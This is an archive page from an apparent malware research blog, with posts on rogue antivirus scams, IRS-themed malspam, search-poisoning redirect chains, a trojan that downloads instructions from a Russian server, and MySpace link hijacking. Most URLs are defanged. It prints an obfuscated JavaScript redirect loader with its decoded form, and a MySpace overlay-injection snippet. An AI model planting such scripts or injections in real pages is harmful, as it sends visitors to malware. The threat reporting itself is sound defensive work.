Archive for the 'Social Engineering' Category

11
May

“Farrah Fawcett dead” search leads to malware installation

By djpnuemo Comment
Categories: Database Update, Malicious Domains, Malicious Links, Malware, Malware Distribution, Rogue Security Software, Rogue Software and Social Engineering

I stumbled upon another website intended on convincing the user that they’re infected to install a fake anti-malware program. This time searching the terms ‘farrah fawcett dead’ revealed the website responsible even though we know Farrah Fawcett is not dead. This is a fairly typical redirection technique that requires the user to be referred from a Google search for the redirection to complete. Continue below to see screenshots and additional information on the sites in question.

When you click on the second link shown in the picture above, you will go through the following redirections…

hxxp://test.proudmoores-löwengarde.de/2/pim861.html
-> hxxp://iklopo_automatobb.holdplays.com/index.html?Ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3
Den%26client%3Dfirefox-a%26rls%3Dorg.mozilla%253Aen-US%253Aofficial%26hs%3DSPJ%26as_q%3D%2Bdead%26a
s_epq%3DFarrah%2BFawcett%2B%26as_oq%3D%26as_eq%3D%26num%3D10%26lr%3D%26as_filetype%3D%26ft%3Di
%26as_sitesearch%3D%26as_qdr%3Dw%26as_rights%3D%26as_occt%3Dany%26cr%3D%26as_nlo%3D%26as_nhi%3D
%26safe%3Dimages
-> hxxp://liveavantbrowser2.cn/go.php?id=2009-1541&key=cd19f5036&p=1
-> hxxp://computerscanv1.com/1/?id=2009-1541&smersh=262861b37&back=%3DjQwxDjwMgQMMI%3DM
-> hxxp://computerscanv1.com/download/Install_2009-1.exe

The rogue that is installed on the first go around is Personal Antivirus as shown below. Upon visiting the website multiple times, you will be redirected to other domains distributing different rogue programs.

Whois Record for hxxp://liveavantbrowser2.cn
Whois Record for hxxp://computerscanv1.com

Install_2009-1.exe
Result: 1/40 (2.5%)
MD5: fa620ca09480ce88f5ba2ce8e1bd7293
VirusTotal
Anubis Analysis
hxxp://computerscanv1.com/download/

UPDATED 5:00PM 5/11/09

Looking more in to the situation, you can see from the screenshot below the amount of pages. There are almost 3,000 pages of keywords intended to get the user to the malware site. There are thousands of combinations that could be grabbed from these sites.

hxxp://test.proudmoores-löwengarde.de = hxxp://xn--proudmoores-lwengarde-tec.de

Whois Record for hxxp://xn--proudmoores-lwengarde-tec.de

07
Sep

Malspam: Notices from IRS (taxform_for_print.scr)

By djpnuemo Comments
Categories: E-mail, MalSpam, Malicious Links, Malware, Malware Distribution and Social Engineering

Here is a piece of malspam we received that poses to be from the IRS telling you that you are due for a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr

taxform_for_print.scr
Result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
VirusTotal
ThreatExpert Analysis

25
Aug

Antivirus 2008 Pro XP

By ion Comments
Categories: E-mail, Malicious Domains, Rogue Security Software, Rogue Software and Social Engineering

We came across a new domain name registered at estdomains today. This site may appear seamlessly legitimate, as it sports a support page, affiliate page, terms of service, etc. But we can assure you that it is a bad site. Be aware of this site and do not download any of the files associated with it! Site: hxxp://antivirus2008proxp.com

What it looks like:

Antivirus 2008 Pro XP

Removal:

Remove this threat with MalwareBytes!

26
Jul

The new wave of malware being sent by email, botnet for hire?

By ion Comments
Categories: E-mail, Malicious Links, Rogue Software, Social Engineering and Vulnerabilities

My friend Lithium has been blogging about the recent wave of malware being distributed by emails. There seem to be 2 differentiated campaigns right now:

1- Emails that have links to compromised web sites (no attachments)

2- Emails that have a .zip/exe attachment

As I was working on some of our customers computers (they got infected when clicking an email from UPS, even when they never shipped anything…) I realiced how bad this actually is. The people think that they are being infected by the rogue antivirus programs (antivirus xp, antivirus 2009, 2009 antivirus, aav,… whatever they decide to promote) but the origin of the infection itself is much worst than that:

The file received on the email is actually a variant of ZTOP or Sinowal (name changes depending on AV vendor)  These trojans have self update, key logging and remote control capabilities. Once installed, they “Phone home” to download updated commands. They do this periodically.

I ran one of them at one of my virtual machines. For a few seconds, nothing happened and I was even tempted to run it again. The the trojan connected to russia (hxxp://blatundalqik.ru/panama/odessa.bin) and downloaded new instructions. Inmediatelly, my virtual machine began closing applications, and before it restarted on its own the desktop background changed to the popular “your computer is infected”.

Once the computer restarted, I got one of the variants of xp antivirus running and my real antivirus was just dead. Constant warnings where coming from the task bar.I have seen this warnings hundreds of times. They are annoying, but usually they are not dangerous. This time is different.

What actually happened is that the trojan had installed itself (ntos.exe, crypts.dll, wnspoem folder and video/audio.dll files) and after calling home it was ordered to install xp antivirus. They ordered to install xp antivirus the same way they could have ordered to silently monitor the user browsing and capture any bank or credit card information. Tomorrow they may decide that they need spamming computers, or to do a DOS on a company… all they have to do is change the configuration file. All the infected zombies will follow orders!

Once ntos.exe and crypts.dll installs in a computer, the computer no longer belongs to the user. Using root kit technologies, the file will hide itself from the user, and only advanced rootkit detectors will be able to reveal the real problem. The trojan also runs from a temporary file on the temp folder, while crypts.dll monitors that the required registry entries to load it on restart are still present. The computer is now part of a botnet, another zombie to be used as needed.

About the xp antivirus infection? It’s anoying, you may have to fix a few registry entries to gain full desktop functionality but unless you go and buy their thing, they are more or less harmless (at least from a tech point of view, I’m sure the user will see that being worst than having a silent trojan)

Only the people controlling the hxxp://blatundalqik.ru server will know the actual extend of the infection. Besides the pop-ups and attempts to get your credit card information, the trojan could be recording your every key stroke, logging your visits to pay your bills, even taking screen shots of your applications; while all your confidential information is conveniently backed up in a server in Russia, should it ever be needed by some one (other than you)

The overload of xp antivirus and similar calls to the antivirus companies has also the effect of saturating their resources, having to dedicate more and more time to manual removal of infections, to keep the customer happy, while the real malicious codes are lurking on the background, undetected.

 

26
Jul

More malicious search engine results…

By ion Comments
Categories: Malicious Links, Rogue Software, Social Engineering and Vulnerabilities

This was quite interesting. One of my co-workers just learned that there is a malicious html page with his name on it! When I downloaded the page down we realized that it was not a targetted attack, but a different variant of the malicious pages I reported under my MSN malicious results post.

This server actually had 3179 other html pages, each one with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages.

The script looks like the one reported before:

function zrwe(yry,dtj){if(!dtj){dtj=’SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0′;}var y;var OR=”;for(var vadz=0;vadz<yry.length;vadz+=4){y=(dtj.indexOf(yry.charAt(vadz))&63)<<18|(dtj.indexOf(yry.charAt(vadz+1))&63)<<12|(dtj.indexOf(yry.charAt(vadz+2))&63)<<6|dtj.indexOf(yry.charAt(vadz+3))&63;OR+=String.fromCharCode((y&16711680)>>16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}zrwe(’2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS’);

And it translates into:

window.location=encodeURI(“hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=”+encodeURIComponent(document.referrer)+”¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.URL)+”&default_keyword=XXX”);

The redirection has changed to a different server:

hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=

Right now this is directing you to antivirus2008scanner.com, one of the multiple variants of rogue antivirus on the market. scan.wspscanner.com is another possible destination.

How difficult is to get to one of those pages?

Continue reading ‘More malicious search engine results…’

24
Jul

Hillary and Obama are gay. President Bush killed… What’s next?

By lithium Comments
Categories: MalSpam, Malware, Rogue Software, Social Engineering and Thoughts

Hillary and Obama are gay. President Bush killed in Afghan bombing…What’s Next?

We do not mean to bore you with the same old malspam posts every day but after viewing this last e-mail I got to thinking…

What will the next threat be once everyone realizes that almost all e-mail requesting the user to watch a video is malware?  What is the next step for the malware creators? Will exploits increasingly become the delivery of choice? Will site hijacking move to the front of the line?  Will legitimate stories on social media sites like digg, reddit, or twitter compromise the users’ security unknowingly?

We are starting to see that in 2009 many security vendors are tightening the belt on the machine they once had control of 10 years ago.

Assuming that the industries effort in 2009 is not futile, what will the new pressure create?  My honest opinion is that the malware will continue to get smaller, more efficient, and even less intrusive than it already is.  Rogue Anti-Malware products replaced with stealthier cousins perhaps.

Only a few things remain certain.  The criminals still need our credit card numbers, social security numbers, and any other sensitive data that can be sold on the black market and social engineering with stealth malware will remain the easiest way to obtain such data.

Hoaxes use weaknesses in human behaviour to ensure they are replicated and distributed. In other words, hoaxes prey on the Human Operating System.  -Stewart Kirkpatrick

I am interested in hearing your opinion.  Leave me a message in the comments or just e-mail me at lithium@malwaredatabase.net and we can talk about it.


24
Jul

MySpace infected pages distributing ZLOB

By ion Comments
Categories: Malicious Links, Malware, Social Engineering and Vulnerabilities

During the last weeks I have seen a few infected MySpace pages. Pages from regular users that get “corrupted” by malicious visitors. The malicious attacker will insert an iframe onto one of the posts on the page, turning most of the page into a huge hyperlink to a malicious site.

This is an example of the code that gets inserted:

<.a ggg= </ggg href="<hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk>" style="position:absolute; top:0px;background-repeat:no-repeat;left:0px; height:860px;width:1263px;background-image:url( <http://x.myspace.com/images/clear.gif);> background-position:left;">

Take a closer look at the link itself:

hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk

It looks just like any other myspace link but pay closer attention: There are no “/”! There should have been one after myspace.com, and before index.cfm. Without the slash, the real domain of the page is now 16658764.tk, far different from what they want the user to believe it is. A regular user will not notice the difference and if he clicks on the hot area of the page, he will end landing up here:

hxxp://myspacelogin-error900.freehostia.com/myspace.php

The MySpace user will most likelly install the “new MySpace object browser”, but instead he or she will be agreeing to install a new variant of ZLOB. This means lots of pop-ups, constant warning about the computer being infected (hey, but give us your moneys and we’ll clean it for you with our super-duper anti virus)…

There is no good way of getting out of that page. It’s either you accept the download, or you must kill your Internet Explorer. if you select cancell you’ll be put on a “cancel, you sure, ok, cancel” loop. Just use task manager and will the browser.

We have downloaded THOUSANDS of samples of ZLOB from that location, each one slightly different to make life more difficult to the AV vendors.

Be careful. Always double check your links and do not accept any “free updates” from suspicious sites.

22
Jul

New Malspam: Jay Leno refuses to quit (flashcodecinstall_13_31.exe)

By djpnuemo Comments
Categories: E-mail, MalSpam, Malicious Links, Malware and Social Engineering

We’ve been receiving more malspam with current events as the subject, but today it is pushing a different file. I have compiled a list of subjects/bodies of the malspam along with a domain list from which the malware is being hosted.

These sites are supposedly showing a video but when the page loads, it uses javascript to prompt the user to download flashcodecinstall_13_31.exe.

00.html -> dnd.js -> master.js -> flashcodecinstall_13_31.exe

The malware reported here is available in our repository. To find the lists of malspam and domains, read more.

Continue reading ‘New Malspam: Jay Leno refuses to quit (flashcodecinstall_13_31.exe)’

« Previous Entries
SANDBOX

SANDBOX ANALYSIS PAGE




 

September 2010
M T W T F S S
« Aug    
 12345
6789101112
13141516171819
20212223242526
27282930